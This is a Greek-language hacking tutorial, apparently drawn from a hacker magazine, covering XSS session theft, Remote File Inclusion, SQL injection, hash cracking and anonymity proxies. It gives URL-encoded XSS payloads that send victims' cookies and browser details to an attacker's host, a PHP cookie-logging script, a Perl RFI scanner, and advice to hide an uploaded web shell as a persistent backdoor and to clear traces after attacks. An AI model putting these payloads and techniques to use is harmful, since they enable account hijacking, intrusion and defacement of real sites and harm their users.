σελίδες που θα χρησιμοποιήσουν άλλοι χρήστες. Έτσι ίσως είναι λίγο
αόριστο, θα δούμε παρακάτω τι ακριβώς εννοώ, αλλά πρίν απ' αυτό ας
ξεκαθαρίσουμε κάτι. Για λόγους αποδοτικότητας και ταχύτητας κάποιο
μέρος των λειτουργιών μιας ιστοσελίδας εκτελούντε στον υπολογιστή του
client και όχι του server, συνήθως τέτοιες είναι απλές λειτουργίες που θα
ήταν ανούσιο να εκτελούντε από τον server, αυτά όνομάζονται client side
scripts και το πιο δημοφιλές είναι είναι η javascript της Netscape.
Από κάτω ακολουθεί ένας αναλυτικός οδηγός μιας κοινής XSS επίθεσης.
Xss ή αλλιώς (Cross Site Scripting), με απλά ελληνικά είναι η εισαγωγή κώδικα μέσα
σε κάποιο site με στόχο την απόκτηση πληροφοριών που δεν προορίζονται για
δημοσιοποίηση. Κλασική μέθοδος στο παγκόσμιο «γίγνεσθαι» των επιθέσεων
(http://tinyurl.com/yxzaoj ). Ως συνήθως, όμως, μην περιμένετε σε αυτό το άρθρο να
σας δώσουμε ορισμούς, υπέροχες και σημαντικές περιγραφές επιθέσεων άλλων και
να τελειώσουμε παραθέτοντας τα είδη XSS. Όλα αυτά ανήκουν στην συμβατική
βιβλιογραφία. Εμείς θα μπούμε στη θέση ενός επιτιθέμενου, θα δούμε πως
σκέφτεται, πως δρα, και τι προγράμματα κατασκευάζει. Πριν ξεκινήσουμε, όμως,
οφείλουμε να αναφέρουμε το εξής: Αρκετοί, ίσως μάλιστα πολλοί security experts
δεν θεωρούν το XSS σαν απειλή. Μάλιστα, έχουμε παρατηρήσει οτι σε αρκετά sites
που παρουσιάζουν αδυναμίες σε XSS και που οι διαχειριστές τους ενημερώθηκαν,
δεν έκαναν τίποτε απολύτως για να καλύψουν αυτήν την «αδυναμία». Έχουν δίκιο
ή άδικο; Σε αυτό το άρθρο θα προσπαθήσουμε να δώσουμε μια απάντηση
σε αυτό το ερώτημα.
Θα σας περιγράψουμε την μεθοδολογία που θα ακολουθήσουμε, φυσικά
τεκμηριώνοντας το κάθε μας βήμα και μετά να σας δείξουμε πως θα την
υλοποιήσουμε.
Μια μέθοδος XSS, που μπορούμε υλοποιήσουμε, είναι να εκτελέσουμε κώδικα σε
ένα site που δεν μας ανήκει και που δεν έχουμε δικαιώματα πρόσβασης εκτέλεσης
κώδικα. Η εκτέλεση κώδικα, όμως, δεν είναι αυτοσκοπός. Θα αποτελέσει ένα μέσο
για να πάρουμε κάποιες πληροφορίες με τις οποίες θα μπορούμε, αργότερα, να
μπούμε στο site αυτό.
Για να γίνει κατανοητό τι κώδικα θα εκτελέσουμε θα πρέπει να εξηγήσουμε κάποια
πράγματα σε λίγο περισσότερο βάθος: Όπως είναι γνωστό το internet είναι
stateless. Χμ.. χιλιοειπωμένη λέξη. Τι σημαίνει όμως; Σημαίνει οτι κάθε φορά που
καλούμε στον browser μας μια σελίδα από κάποιον server, αυτός (ο server) «νομίζει»
οτι μας «βλέπει» για πρώτη φορά! Δεν έχει κανένα ενσωματωμένο (build-in) τρόπο
να καταλάβει αν έχουμε ξαναζητήσει την σελίδα από αυτόν ή αν τον
επισκεπτόμαστε πρώτη φορά στην ζωή του. Για να καταλάβετε πόσο πολύ
σημαντικό είναι αυτό, σκεφτείτε το εξής παράδειγμα: Ας πούμε οτι κάνουμε
εγγραφή σε ένα site. Τι κάνουμε σαν πρώτο βήμα;
Δίνουμε τα στοιχεία μας, το nick μας και το password μας και ο server από την
στιγμή που γραφτούμε μας. . «θυμάται». Χμ.. στην πραγματικότητα δεν μας
θυμάται ο ίδιος αλλά η βάση δεδομένων που χρησιμοποιεί και καταχωρεί εκεί τα
στοιχεία μας. . Ok.. ως εδώ καλά!
Κάθε φορά όμως που επισκεπτόμαστε τον site αυτό, εισάγουμε μια φορά μόνο τα
στοιχεία μας (nick και password) και στην συνέχεια μπορούμε πραγματοποιήσουμε
ένα σωρό από ενέργειες που επιτρέπονται μόνο σε εγγεγραμμένους χρήστες, να
πατάμε σε διάφορα links χωρίς ο server να μας ρωτάει κάθε φορά τα στοιχεία μας.
Κανονικά όμως,
κάθε φορά που πατάμε επάνω σε ένα link που αφορά στον συγκεκριμένο server,
αυτός δεν γνωρίζει αν τον έχουμε ξανασκεφτεί! Αυτό είναι το λεγόμενο stateless,
και οφείλετε (εντελώς περιγραφικά) στον τρόπο που έχει κατασκευαστεί το
πρωτόκολλο επικοινωνίας μεταξύ εμάς και του server (http://tinyurl.com/fwghj). Το
ερώτημα, τώρα είναι, πώς ο server γνωρίζει, όχι μόνο οτι τον έχουμε ξανα-
επισκεφτεί, αλλά και όλα μας τα στοιχεία (nick και password) και δεν μας τα ρωτάει
κάθε φορά που κάνουμε μια ενέργεια (όπως π.χ. το να απαντήσουμε σε ένα
προσωπικό μήνυμα);
Προσέξτε εδώ μην μπερδευτείτε. Δεν μιλάμε για την πληροφορία οτι είμαστε
εγγεγραμμένοι χρήστες του forum. Αυτή όπως είπαμε καταχωρείτε μια φορά κατά
την εγγραφή μας στην βάση δεδομένων του server. Μιλάμε για τις επόμενες
ενέργειες, αφού γραφτούμε! Πως ξέρει ο server οτι είμαστε εμείς που πατήσαμε ένα
κουμπί και δεν είναι κάποιος άλλος, εφόσον όπως είπαμε, η «λειτουργία» του είναι
stateless; Μήπως καταχωρεί κάπου αυτήν την πληροφορία;
Ακριβώς,.. και ποιο συγκεκριμένα την καταχωρεί στο.. PC μας! Πρόκειται για τα
λεγόμενα cookies ή αλλιώς, πρόκειται για τα συμπαθέστατα μπισκοτάκια. Με απλά
λόγια, τα μπισκοτάκια είναι κάποια δεδομένα που καταχωρούνται, μέσω του
internet browser που χρησιμοποιούμε, στον δίσκο μας και χρησιμοποιούνται από
σχεδόν όλα τα sites, για να καταλάβει ο αντίστοιχος server ποιοι είμαστε.
Το επόμενο ερώτημα που μπορεί να σας έρχεται στο μυαλό. . ή καλύτερα, το πρώτο
κατά σειρά (λέμε τώρα), είναι, τι ακριβώς καταχωρείται;
Χμ.. ανάλογα! (με ότι αυτό συνεπάγεται!!). Συχνά, σε sites ή forums, καταχωρείτε
ένας μεγάλος δεκαδικός αριθμός ο οποίος συμβολίζει εμάς και ο server μας
αναγνωρίζει μέσω αυτού. Επίσης καταχωρούνται και κάποιες άλλες πληροφορίες,
όπως ημερομηνία και ώρα που μπήκαμε, η διάρκεια ζωής του «μπισκότου» και
διάφορα άλλα, ανάλογα τι πληροφορίες θέλει ο server να επεξεργαστεί κατά την
ταυτοποίηση μας. Τέτοια cookies ονομάζονται session cookies, δηλαδή μπισκοτάκια
με. . ημερομηνία λήξης και αυτό γιατί έχουν περιορισμένη διάρκεια ζωής, μέχρι να
κλείσουμε τον internet browser ή αλλιώς να τερματίσουμε το session.
Φανταζόμαστε οτι έχετε ήδη αναρωτηθεί τι θα γινότανε αν κάποιος.. πονηρός,
«έκλεβε» αυτά τα cookies και τα έβαζε στον δικό του browser: Απλά, θα έμπαινε σαν
κύριος στο εκάστοτε site προσποιούμενος… εσάς! Η επίθεση αυτή είναι επίσης
γνωστή σαν πλαστοπροσωπία (impersonation). Αυτός θα είναι και ο σκοπός μας.
Θα προσπαθήσουμε να μπούμε σε ένα γνωστό site εύρεσης εργασίας μέσω
impersonation. Για να γίνει όμως αυτό θα πρέπει να
μπορέσουμε να «κλέψουμε» τα cookies κάποιου «νόμιμου» (εγγεγραμμένου)
χρήστη.
<script>alert(“Hel oTotalHacker!!”);</script>
Εικόνα 2: To αποτέλεσμα που βλέπουμε δείχνει οτι ο server έχει μια «αδυναμία» σε
επιθέσεις XSS.
Από εδώ και πέρα μπορούμε να εκτελέσουμε ότι javascript εντολή θέλουμε.
Ακόμα και αυτήν που μας δείχνει τα cookies του user,... ναι υπάρχει τέτοια
εντολή. Αν δώσουμε την παρακάτω εντολή:
<script>alert(document.cookie)</script>
Θα πάρουμε σαν αποτέλεσμα ένα πολύ ωραίο παράθυρο το οποίο μας
δείχνει τα cookies που μας έχει δώσει ο συγκεκριμένος server (εικόνα 3).
Μέχρι εδώ δεν έχουμε καταφέρει κάτι πάρα πολύ σπουδαίο. Στην καλύτερη
περίπτωση βλέπουμε τα δικά μας cookies. Όμως, αν παρατηρήσετε καλά, θα
διακρίνετε (με δυσκολία, διότι το έχουμε καλύψει για λόγους ασφάλειας) οτι
ο κώδικας javascript εκτελείται και από το URL. Συγκεκριμένα εκτελείται η
παρακάτω εντολή:
>
Αν η παραπάνω εντολή εκτελεστεί στον internet browser του θύματος, τότε
θα εμφανίσει στην οθόνη του τα cookies του. Βέβαια αυτό δεν λέει και
τίποτα μιας και αυτός που θα τα δεί θα είναι ο ιδιοκτήτης των cookies και
όχι εμείς... οι κακοί! Aυτό που μένει να επιτύχουμε για να επιτύχουμε τον
αρχικό σκοπό μας (που είναι να κλέψουμε τα cookies του χρήστη) είναι 2
στόχοι:
Στοχος 1: Να κάνουμε την παραπάνω εντολή να εκτελεστεί στο PC του
«θύματος».
Στοχος 2: Να μην δείξουμε τα cookies στην οθόνη του θύματος αλλά να τα
καταχωρήσουμε με κάποιο τρόπο κάπου που θα γνωρίζουμε μόνο εμείς, ενώ
ο χρήστης «θύμα» δεν θα καταλάβει τίποτα!
Εικόνα 3: Εδώ βλέπουμε τα cookies που μας έχει δώσει ο συκεκριμένος server.
Διαδικασία επίτευξης Στόχου 1
Υπάρχουν διάφοροι τρόποι να επιτύχουμε αυτό τον στόχο. Εμείς θα
επιλέξουμε αυτόν που χρησιμοποιείται πιο συχνά: Το περίφημο phishing
(http://tinyurl.com/48zm2). Θα στείλουμε το «κακό» url στο θύμα μας με την
μορφή link και θα περιμένουμε να το πατήσει. Όπως θα δούμε παρακάτω,
πολλές φορές δεν είναι καν απαραίτητο να «πατήσει» κάπου το θύμα για να
την... «πατήσει»: Μια κίνηση με το... ποντίκι είναι αρκετή για να «φάει» στο...
δόλωμα! Συνήθως το URL αποστέλλεται με κάποιο mail ή εισάγεται σαν link
σε κάποιον server που ο επιτιθέμενος έχει πρόσβαση. Από τη στιγμή που θα
μπεί το «δόλωμα» στην «πετονιά», το μόνο που χρειάζεται από τον
επιτιθέμενο είναι να περιμένει. Σας
διαβεβαιώνουμε οτι θύματα θα βρεθούνε πάρα πολλά! Ανεξαρτήτου ηλικίας
ή γνώσεων. Το αποτέλεσμα είναι πραγματικά εντυπωσιακό όσο αφορά στην
ευκολία που μπορεί κάποιος να την «πατήσει»... (συμπεριλαμβανομένου και
του... γράφοντος!!).
Αυτό που θέλουμε να κάνει το URL είναι να στείλει το θύμα σε ένα link το
οποίο θα του «κλέψει» τα cookies (δες επόμενη παράγραφο «Διαδικασία
επίτευξης Στόχου 2»).
Μπορούμε να χρησιμοποιήσουμε javascript μέσω XSS (όπως είδαμε
παραπάνω) για να στείλουμε τον χρήστη σε ένα τέτοιο link (redirection).
Υπάρχουν πολλοί τρόποι να συντάξουμε το «κακό» XSS που θα υλοποιεί το
redirection. Εμείς προτιμάμε κάποιον από τους ακόλουθους 2:
Άμεσο redirection. Πατώντας το link το θύμα οδηγείται στο κακό site μας
περνώντας σαν παράμετρο τα cookies του:
http://to.8yma.com/results?kAndEntire=%3Cscript%3Edocument.location%3D
%22http
%3A%2F%2Fkapa.freevar.com%2Ftests%2Fkakoscript1.php%3Fparam%3D
%22+
%2B+document.cookie%3B%3C%2Fscript
%3E+&searchType=results&network=&networkView=main
Έμεσο redirection. Εδώ θα μπορεί να εμφανιστεί μια αθώα σελίδα έχοντας το
κακό link καλυμένο με κάποιο φαινομενικά άκακο όνομα (ας πούμε
«Microsοft»;;;). Το θύμα απλά περνώντας το ποντίκι του επάνω από το link
(που είναι πράγματι το link της Microsoft) την έχει πατήσει, χωρίς να το
καταλάβει. Εδώ χρειάζεται λίγη περισσότερη javascript. Αυτό που κάνει το
παρακάτω javascript είναι να ελέγχει αν ο χρήστης «πέρασε» το ποντίκι του
επάνω από το Link της Microsoft. Αυτό αρκεί για να εκτελεστεί ο κακός
κώδικας. Δεν χρειάζεται καν να πατήσει το link - το οποίο άλλωστε οδηγεί
πραγματικά στην Microsoft:
http://to.8yma.com/results?kAndEntire=%3Ca+href%3D%22http%3A%2F
%2Fwww.microsoft.com%22+onmouseover%3D%22javascript
%3Adocument.images
%5B1%5D.src%3D%27http%3A%2F%2Fkapa.freevar.com%2Ftests
%2Fkakoscript2.php%3Fparam1%3D%27%2Bdocument.cookie%2B
%27%26param2%3D%27%2Bnavigator.userAgent%3B%22%3EMicrosoft%3C
%2Fa
%3E+&searchType=results&network=&networkView=main
Τα αποτελέσματα της 2ης (και πιο... κακιάς περίπτωσης) φαίνεται στην
εικόνα 4. Δώστε βάση στα “kakoscript1.php” και “kakoscript2.php”. Είναι οι
κλέφτες!! Θα τους αναλύσουμε αμέσως μετά. Προσέξτε επίσης τις
παραμέτρους που περνιούνται στους «κλέφτες» (π.χ. στο “kakoscript2.php”):
Παράμετρος 1: document.cookie (το περιεχόμενο του μπισκότου! του
θύματος).
Παράμετρος 2: navigator.userAgent (το όνομα του internet browser του
θύματος).
Οι υπόλοιπες παράμετροι που φαίνονται στο URL απαιτούνται από το
συγκεκριμένο site για να λειτουργήσει σωστά η αναζήτηση.
Σκεφτείτε, λοιπόν, να σας έρθει ένα mail που να δείχνει το link αυτό που
δείχνει η εικόνα
4. Αυτό λοιπόν το link σας αναφέρει για μια πολύ καλή ευκαιρία στην
Microsoft. Αρκεί να περάσετε το ποντίκι επάνω στο επιλεγμένο link… και τα
cookies σας, αποστέλλονται στους... κακούς! Απαραίτητη προϋπόθεση να
λειτουργήσει αποδοτικά κάτι τέτοιο είναι να είστε εγγεγραμμένοι σε αυτό το
site και την στιγμή που πατήσετε το link να έχετε ήδη
μπεί στο site σαν χρήστες (για να έχουνε ενημερωθεί τα κατάλληλα cookies).
Εικόνα 4: Ένα... φαινομενικά άκακο link που οδηγεί πραγματικά στην Microsoft.
Διαδικασία επίτευξης Στόχου 2 Αυτό που θα δείξουμε εδώ είναι o τρόπος
που κατασκευάζονται οι κλέφτες των μπισκότων! θα χρειαστούμε ένα δικό
μας server και πολύ λίγη γνώση php. Δικό μας server είναι πολύ εύκολο να
βρούμε μιας και οι εταιρίες Free Web Hosting είναι εκατοντάδες.
Έχοντας ένα server, το μόνο που μένει να φτιάξουμε είναι του κλέφτες,
δηλαδή τα “kakoscript1.php” και “kakoscript2.php”.
Θα περιγράψουμε το kakoscript2 μιας που είναι υπερσύνολο του 1. To μόνο
που κάνει αυτό το script είναι να λαμβάνει ένα cookie καθώς και το όνομα
του internet browser του θύματος και να τα καταχωρεί (στον κακό server) σε
ένα αρχείο με το όνομα aaa.txt.
<?php
$biskotaki = $HTTP_GET_VARS["param1"]; // Tο. . μπισκοτάκι.
$browser = $HTTP_GET_VARS["param2"]; // Tο όνομα του
browser.
$txtfile = fopen('aaa.txt', 'a+'); // Ανοίγουμε το αρχείο.
fwrite($txtfile, "-- biskotaki --------\n"); // Γράφουμε μέσα τις
fwrite($txtfile, $biskotaki . "\n"); // πληροφορίες που πήραμε.
fwrite($txtfile, $browser . "\n");
fwrite($txtfile, "------------------\n");
fclose($txtfile); // Κλείνουμε το αρχείο.
?> // Σας ευχαριστούμε που διαλέξατε εμάς για την... ενημέρωση σας!! Καλή
σας νύχτα!
Το χρονικό της επίθεσης Η «επίθεση» στο παραπάνω site έγινε ελεγχόμενα:
Κάποιος φίλος έκανε εγγραφή στο συγκεκριμένο site. Μετά του στείλαμε
εμείς το κακό link και εν γνώση του πάτησε σε αυτό, στέλνοντας μας τα
cookies και πληροφορίες για τον Internet browser που χρησιμοποίησε.
Βάζοντας εμείς τις τιμές των cookies του στα δικά μας
cookies (που εμείς δεν είμαστε εγγεγραμμένοι χρήστες) μπορέσαμε να
μπούμε μέσα στο site με το όνομα του φίλου μας! Αυτό, στον «φυσικό»
κόσμο ονομάζετε πλαστοπροσωπία ή impersonation και φυσικά δεν
θεωρείται ούτε νόμιμο ούτε έξυπνο!! Πονηρό ναι! Αλλά όχι έξυπνο.
Ας αναλύσουμε λοιπόν την «επίθεση». Μόλις ο φίλος μας «τσίμπησε» το
«δόλωμα» εμείς είδαμε στο aaa.txt τις εξής τιμές:
Εικόνα 5: Το αρχείο κλεπταποδόχος των cookies.
Στην εικόνα 5 βλέπουμε την τιμή του βασικού session cookie. Αυτή την
αντιγράφουμε στα δικά μας cookies, έχοντας μπει στο ίδιο site σαν απλοί
επισκέπτες! Η αντιγραφή του cookie μπορεί να γίνει πολύ εύκολα με την
χρήση του add-on του firefox Web Developer Toolbar
(http://tinyurl.com/2ek6ec) (εικόνα 6)
LFI: Όταν η αυτοκρατορία πέφτει από μέσα! Την εποχή των βασιλιάδων και
των ιπποτών, τότε που οι μάχες έδιναν κι έπαιρναν και η ασφάλεια του
κάστρου έπαιζε σημαντικό ρόλο για την τύχη ολόκληρης της αυτοκρατορίας
(ή κάτι τέτοιο, τέλος πάντων), παράλληλα με την ωμή βία γίνονταν και
ύπουλες απόπειρες για προσβάσεις στο κάστρο – στόχο. Το πώς, είναι
μάλλον προφανές: Πάντα υπήρχε μια κρυφή, ξεχασμένη πόρτα, στην οποία
λίγοι έδιναν σημασία. Κι όμως, συχνά οι επιτιθέμενοι την έβρισκαν, με τη
συνδρομή κάποιου καλοθελητή από μέσα.
Φανταστείτε, τώρα, ένα καλά οχυρωμένο κάστρο, το οποίο όμως κρύβει
μέσα τους μαρτυριάρηδες αυλικούς, έτοιμους να προδώσουν τα μυστικά
του. Σταματήστε να φαντάζεστε. Παρόμοιες καταστάσεις συναντάμε και
σήμερα!
Remote File Inclusion (R.F.I) είναι ένας από τους πάρα πολλούς τρόπους για
να κάνεις deface ή να πάρεις root σε ένα μηχάνημα, εκμεταλλευόμενος πάντα
κάποια “αδυναμία” στον κώδικα (vulnerability).
Η επίθεση με R.F.I. επιτρέπει σε αυτόν που κάνει την επίθεση να τρέξει τον
δικό του κώδικα – συνήθως php – (script) στο site στο οποίο έχει τις
“αδυναμίες” στον κώδικα. Ένα παράδειγμα από κώδικα που μπορεί να
δεχθεί επίθεση γιατί η μεταβλητή δεν καθορίζεται συγκεκριμένα:
(Το παράδειγμα είναι τυπικό και είναι για την συγκεκριμένη περίπτωση του
παραδείγματος) include($title . '/archive.php'); και το url:
www.vulnerable.website.com/index.php?title=archive.php ?
Κάποιος μπορεί να εκμεταλλευτεί την αδυναμία αυτή και να εκτελέσει ένα
php script που θα του δώσει την δυνατότητα να εκτελέσει κάποιες εντολές,
να ανεβάσει αρχεία (ανάλογα με τα permissions) και γενικά να πάρει
πληροφορίες. Tα scripts αυτά είναι γνωστά ως web shel s. Tα πιο γνωστά
web shel s είναι το: c99 και το r57.
O τρόπος με τον οποίο μπορούν να εκτελεστούν είναι ο εξής:
www.vulnerable.website.com/index.php?
title=http://www.malicious.code.com/C99.txt?
archive.php
Στην θέση του C99.txt θα μπορούσε να είναι οποιοδήποτε αρχείο με κώδικα
το οποίο είναι ανεβασμένο σε έναν remote web server. Στο παράδειγμα αυτό
ο server είναι:
www.malicious.code.com.
Πρέπει να σημειώσουμε πως θα πρέπει ο server στον οποίο είναι
ανεβασμένη η σελίδα με τις αδυναμίες στον κώδικα να “επιτρέπει” το R.F.I.
γιατί υπάρχουν τρόποι & ρυθμίσεις που αποτρέπουν την εκτέλεση remote
αρχείων. Για να βρει κάποιος
αδυναμίες σε ένα site, θα πρέπει να έχει λίγες γνώσεις προγραμματισμού
και κάποια εργαλεία ανίχνευσης αυτών των αδυναμιών, τα λεγόμενα
scanners, που μπορεί να είναι προγράμματα, μηχανές αναζήτησης, ακόμα και
bots που τρέχουν σε IRC Servers. Από κάτω ακολουθεί ένας αναλυτικός
οδηγός για επιθέσεις Remote File Inclusion. Μιας και το Remote File Inclusion
(εν συντομία RFI) έχει μεγάλη “ζήτηση” τελευταία και
είναι το πρόσταγμα του αναγνωστικού κοινού για τα Χριστούγεννα,
απολαύστε ..
ΥΠΕΥΘΥΝΑ (πάντα)!
Στην τεχνική επιθέσεων RFI (Remote File Inclusion), ό επιτιθέμενος εκτελεί
δικό του κώδικα/πρόγραμμα σ΄ ένα απομακρυσμένο site μέσω ενός PHP/ASP
shel που φιλοξενείται σε κάποιον άλλο, (δικό του) server. To site-στόχος,
χωρίς να έχει τη δυνατότητα να “καταλάβει” ότι πρόκειται για εξωτερική
σελίδα, εκτελεί το περιεχόμενό της σαν να ήταν μέρος του. Περιττό να πούμε
ότι, στο 99.9878129% των περιπτώσεων, το αποτέλεσμα είναι
καταστροφικό!
Βήμα 3ο
Ένας τρόπος για να ελέγξουμε αν ένα website είναι ευάλωτο σε επιθέσεις RFI
είναι o εξής:
Έστω ότι έχουμε το site:
http://www.site.gr/i...age=example.php
και αντικαταστήσουμε το στοιχείο example.php με την διεύθυνση του
server , που έχουμε ανεβάσαμε το shel μας, όπως αναφέραμε στο βήμα 1.
Εικόνα 2
Όπως μπορεί να διαπιστώσει ο καθένας, τελικά το συγκεκριμένο site έχει
σοβαρό πρόβλημα και χάρη στο shel aki μας, βλέπουμε όλα του τα
περιεχόμενα! Αν το αποτέλεσμα είναι παρόμοιο με την εικόνα 2, τότε είμαστε
σε πολύ καλό δρόμο, (αφού το site έχει όντος πρόβλημα), και παίρνουμε
μάτι απ' όλα τα περιεχόμενα, και μάλιστα με πολλές “γαργαλιστικές”
επιλογές στη διάθεση μας όπως: Read, Write,
Execute Command Upload, Download, Edit, Delete ...και πολλά άλλα.
Άλλα αντί να κάνουμε όλη αυτή τη διαδικασία χειρωνακτικά, μπορούμε να
γράψουμε
έναν κώδικα (σε perl Φυσικά!) ο οποίος να βρίσκει για εμάς, αν ένα site είναι
ευπαθές σε
επίθεση τύπου RFI.
Κώδικας single_rfi.pl
1.#!/usr/bin/perl
2.
3.use LWP::UserAgent;
4.use HTTP::Request;
5.
6.print "\n(c) totalXaker magazine \n";
7.print "Simple RFI Vulnerability Scanner [mr.pr0n]\n";
8.print "Host: ";
9.print "[Ex: www.xxx.org ]:";
10.chop ($host = <STDIN>);
11.$host = "http://".$host if ($host !~ /^http:/);
12.print "Enter path:";
13.print "[Ex: xxx.php?xxx= ]:";
14.chop ($path = <STDIN>);
15.print "Shell: ";
16.print "[Ex: http://www.xxx.gr/xxxx/r57.txt? ]:";
17.chop ($shell = <STDIN>);
18.print "String: ";
19.print "[Ex: r57shell ]:";
20.chop ($string = <STDIN>);
21.{
22.$rfi=$host."/".$path.$shell;
23.$req=HTTP::Request->new(GET=>$rfi);
24.$useragent=LWP::UserAgent->new();
25.$response=$useragent->request($req);
26.if ($response->is_success) {
27. if( $response->content =~ /$string/){
28.print "$host ,is HACKABLE! :D \n";
29.print "-------------------------------------------------\n";
30.print "$rfi";
31.print "\n-------------------------------------------------\n";
32.}else{
33.print "Maybe $host is not Vulnerable!:( \n";
34.}
35.}}
Εικόνα 3
Το μικρο μας προγραμματακι εν ώρα.. λειτουργίας!Μπορεί να μην είναι αρκετά
εφετζίδικο αλλά κάνει τη δουλειά του μια χαρά (ποιος είπε ότι η εμφάνιση παίζει ρόλο?)
και μας μαρτυράει αν το αντίπαλο site .. έχει “προβληματάκια”!
Βήμα 4ο
Αφού το site που έχουμε στα χέρια μας έχει όντος πρόβλημα, μπορούμε μέσω του shel
μας να ανεβάσουμε στην σελίδα-στόχο το ίδιο το shel .
Σημείωση:
Όταν ανεβάζουμε shel σε ένα server καλό είναι να το “βάζουμε” μέσα σε ένα
απομακρυνόμενο directory με ένα φαινομενικά αθώο όνομα, όπως για παράδειγμα
“default_page.php”. Έτσι θα μπορούμε να έχουμε ανά πάσα ώρα και στιγμή access στο
site απ' την πίσω πόρτα, και ας διορθώσει ο administrator το κενό ασφαλείας :)
Μόλις ολοκληρωθεί η διαδικασία, το αποτέλεσμα θα είναι όπως στην εικόνα 4.
Εικόνα 4
Μόλις ανεβάσαμε στον server το shel μας και είμαστε περήφανοι γι' αυτό! Δεν ξέρω ο
administrator του site, πόσο υπερήφανος μπορεί να νιώσει για τη συγκεκριμένη
αδυναμία του site. Και τώρα είμαστε μέσα! Όχι Αdministrators (αφου εχουμε
uid=99(nobody)) αλλά είμαστε μέσα!(ε! μην ζητάτε και πολλά!)
Στο σημείο που βρισκόμαστε μπορούμε να κάνουμε Defacement στο site το οποίο όπως
καταλάβατε δεν είναι και κάτι το τόσο σπουδαίο ή δύσκολο.. Εννοείτε ΦΥΣΙΚΑ ότι δεν
παρακινώ κανέναν αναγνώστη να προβεί σε τέτοιες ενέργειες αφού το defacement δεν
είναι ένδειξη ανωτερότητας, υπεροχής και γνώσης .. αλλά
περισσότερο για να κάνει κάποιος “μόστρα” και να αποδείξει, ότι πήρε πρόσβαση στο
site! To Defacement που έγινε φαίνεται στην εικόνα 5 και ο λόγος που επιχειρήθηκε είναι
απλά για να γίνει απόλυτα κατανοητό σε όλους (ειδικούς και μη!) το μέγεθος της
σοβαρότητας του προβλήματος σε μια τέτοια επίθεση!.
SQL Injection
Αυτή η επίθεση είναι η πιο περίεργη σε πρώτη ματιά επίθεση. Ας υποθέσουμε
πως έχουμε μια ιστοσελίδα που είναι τρωτή(τρύπια όπως λέμε) σε SQL. Αυτό
που θα κάνουμε είναι ερωτήσεις, σε γλώσσα SQL μέσω της URL στην
ιστοσελίδα και αυτή θα μας δίνει απαντήσεις! Υπάρχουν αρκετές τεχνικές. Η
διαδικασία της επίθεσης ονομάζεται SQL Injection. Φυσικά μπορεί μια
ιστοσελίδα να είναι τρωτή σε μόνο ένα είδος SQL Injection. Οπότε εδώ
πρέπει να πούμε πως δεν υπάρχει μόνο μια τεχνική. Σε κάθε ιστοσελίδα
απαιτείται και διαφορετική αντιμετώπιση.
Μερικά από τα είδη είναι η Blind SQL Injection, η Ms SQL Injection,η My SQL
Injection κτλ. Αυτή η επίθεση είναι εφικτή σε ιστοσελίδες τύπου
mysite.gr/article.php?id=5
Στη θέση του τελευταίου κομματιού μπορούν να μπούν ότι μπορείτε να
φανταστείτε, πρέπει να είναι βασικά της μορφής κάτι.php?id=κάτι. Αυτές οι
τεχνικές, περιγρέφονται πλήρως από τα παρακάτω Ελληνικά βίντεο
τιτόριαλς του cojito, που είναι απλώς αναλυτικότατα.
Μπορείτε να τα κατεβάσετε από εδώ
ΣΗΜΕΙΩΣΗ: Οι κωδικοί οι οποίοι θα βρούμε αν όλα πάνε καλά, κατά 90% είναι
κωδικοποιημένοι σε διάφορα Hashes, όπως MD5, SHA-256 κτλ.
Πώς να σπάσετε τα Hashes;
Όπως και αρκετά πιο πάνω μπορείτε να το κάνετε με την ιστοσελίδα
http://www.md5decrypter.co.uk/ . Αν δεν τα καταφέρετε πάντα υπάρχει η
λύση των προγρμμάτων. Για παράδειγμα το πρόγραμμα cain&abel, είναι
πάντα το καλύτερο πρόγραμμα. Μπορείτε να κάνετε μέσω αυτού bruteforce,
dictionary και rainbow tablets. Μπορείτε να κατεβάσετε το πρόγραμμα από
εδώ (http://www.oxid.it/cain.html). Για να μάθετε να το χειρίζεστε θα σας
πρότεινα κάποιο βίντεο τιτόριαλ από το youtube.
Note: Άν έχετε από win xp /win 7 κατεβάστε από το 2ο λινκ.
Ανωνυμία
Υπάρχουν δύο τρόποι για να κρύψουμε την IP μας όταν κάνουμε περιήγηση στο Internet.
Ο ένας είναι η χρησιμοποίηση proxy στον browser μας και ο άλλος μέσω κάποιων άλλων
ιστοσελίδων που μας δίνουν την δυνατότητα να σερφάρουμε στο Internet ανώνυμα.
Αν λοιπόν δεν μπορούμε να βρούμε κάποιον διαθέσιμο proxy server για να κρατήσουμε την
ανωνυμία μας τότε μπορούμε να χρησιμοποιήσουμε κάποια από τις παρακάτω ιστοσελίδες.Το μόνο
που χρειάζεται ουσιαστικά να κάνουμε είναι να βάλουμε την διεύθυνση της σελίδας που
θέλουμε να μπούμε στο κενό πεδίο και να αρχίσουμε το σερφάρισμα.
Καλό θα ήταν να σβήσουμε και τα προαναφερθέντα cookies του υπολογιστή μας μετά από
κάθε επίθεση, ή ανώνυμη περιήγηση στο ίντερνετ.
Ιστοσελίδες με Web Based Proxy:
http://proxify.com/
http://htmlblock.co.uk/anonymous_web_browser/
http://www.shadowsurf.com/
http://anonymouse.org/anonwww.html
http://www.guardster.com/subscription/proxy_free.php
http://www.the-cloak.com/login.html
Πρόκεται ουσιαστικά για Web Based Proxy και το πλεονέκτημα
που έχουνε είναι ότι δεν χρειάζεται ούτε να εγκαταστήσουμε
κάποιο πρόγραμμα στον υπολογιστή μας για ανωνυμία,ούτε και
ασφαλώς και να ψάχνουμε για proxy συνέχεια και να χάνουμε
χρόνο.
C4pl4in
ΘΑΝΑΣΑΡΑΣ
ΘΑΝΑΣΑΡΑΣ !!!